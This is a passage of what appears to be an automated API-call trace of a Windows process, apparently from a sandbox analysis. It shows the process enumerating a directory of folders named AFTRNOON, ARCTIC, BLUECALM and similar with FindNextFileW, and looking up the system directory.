ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ecb743, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0053.915] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ecb743, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0053.915] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0053.915] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ecb743, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0053.915] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ecb743, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0053.915] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0053.915] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0053.915] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0053.915] CoTaskMemFree (pv=0x4e1c10) [0053.917] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x512f1610, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0053.918] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x512f1610, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AFTRNOON", cAlternateFileName="")) returned 1 [0053.918] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5146e3d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ARCTIC", cAlternateFileName="")) returned 1 [0053.918] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51767f50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AXIS", cAlternateFileName="")) returned 1 [0053.918] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51a15810, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BLENDS", cAlternateFileName="")) returned 1 [0053.919] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51a15810, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BLUECALM", cAlternateFileName="")) returned 1 [0053.919] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51a15810, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BLUEPRNT", cAlternateFileName="")) returned 1 [0053.919] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51a15810, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOLDSTRI", cAlternateFileName="")) returned 1 [0053.919] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51a61ad0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BREEZE", cAlternateFileName="")) returned 1 [0053.919] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51c2ab50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CANYON", cAlternateFileName="")) returned 1 [0053.919] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51c2ab50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CAPSULES", cAlternateFileName="")) returned 1 [0053.919] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51c50cb0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CASCADE", cAlternateFileName="")) returned 1 [0053.919] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51cc30d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="COMPASS", cAlternateFileName="")) returned 1 [0053.920] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51cc30d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CONCRETE", cAlternateFileName="")) returned 1 [0053.920] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a6f8e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6073a7d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6073a7d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DEEPBLUE", cAlternateFileName="")) returned 1 [0053.920] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a6f8e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x60891430, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x60891430, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ECHO", cAlternateFileName="")) returned 1 [0053.920] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51e3fe90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ECLIPSE", cAlternateFileName="")) returned 1 [0053.920] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51f70990, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="EDGE", cAlternateFileName="")) returned 1 [0053.920] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51fe2db0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="EVRGREEN", cAlternateFileName="")) returned 1 [0053.920] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a6f8e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x60af2a30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x60af2a30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="EXPEDITN", cAlternateFileName="")) returned 1 [0053.920] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a6f8e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x61cccf30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x61cccf30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ICE", cAlternateFileName="")) returned 1 [0053.921] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x539538d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d489150, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="INDUST", cAlternateFileName="")) returned 1 [0053.921] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a6f8e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x65d5e3f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x65d5e3f0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IRIS", cAlternateFileName="")) returned 1 [0053.921] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x567be5d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d489150, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="JOURNAL", cAlternateFileName="")) returned 1 [0053.921] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x567e4730, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d489150, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="LAYERS", cAlternateFileName="")) returned 1 [0053.921] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a6f8e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x66247150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x66247150, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="LEVEL", cAlternateFileName="")) returned 1 [0053.921] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x59544a90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d489150, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NETWORK", cAlternateFileName="")) returned 1 [0053.921] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x59c68c90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d489150, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PAPYRUS", cAlternateFileName="")) returned 1 [0053.921] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a44b570, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PIXEL", cAlternateFileName="")) returned 1 [0053.921] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a6f8e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d084c30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d084c30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PROFILE", cAlternateFileName="")) returned 1 [0053.922] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a6f8e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d489150, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="QUAD", cAlternateFileName="")) returned 1 [0053.922] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a829930, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d0d0ef0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d0d0ef0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RADIAL", cAlternateFileName="")) returned 1 [0053.922] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a84fa90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d0d0ef0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d0d0ef0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="REFINED", cAlternateFileName="")) returned 1 [0053.922] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a89bd50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d1db890, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d1db890, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RICEPAPR", cAlternateFileName="")) returned 1 [0053.922] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a71ef90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d489150, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RIPPLE", cAlternateFileName="")) returned 1 [0053.922] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a71ef90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d489150, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RMNSQUE", cAlternateFileName="")) returned 1 [0053.922] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a71ef90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d24dcb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d24dcb0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SATIN", cAlternateFileName="")) returned 1 [0053.922] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a980590, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d2c00d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d2c00d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SKY", cAlternateFileName="")) returned 1 [0053.923] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a980590, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d4d5410, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d4d5410, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SLATE", cAlternateFileName="")) returned 1 [0053.923] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5aad71f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d4d5410, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d4d5410, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SONORA", cAlternateFileName="")) returned 1 [0053.923] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a71ef90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d4d5410, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d4d5410, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SPRING", cAlternateFileName="")) returned 1 [0053.923] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5abe1b90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d3f0bd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d3f0bd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="STRTEDGE", cAlternateFileName="")) returned 1 [0053.923] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a71ef90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d4d5410, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d4d5410, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="STUDIO", cAlternateFileName="")) returned 1 [0053.923] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a71ef90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d416d30, ftLastAccessTime.dwHighDateTime=0x1d301bf, 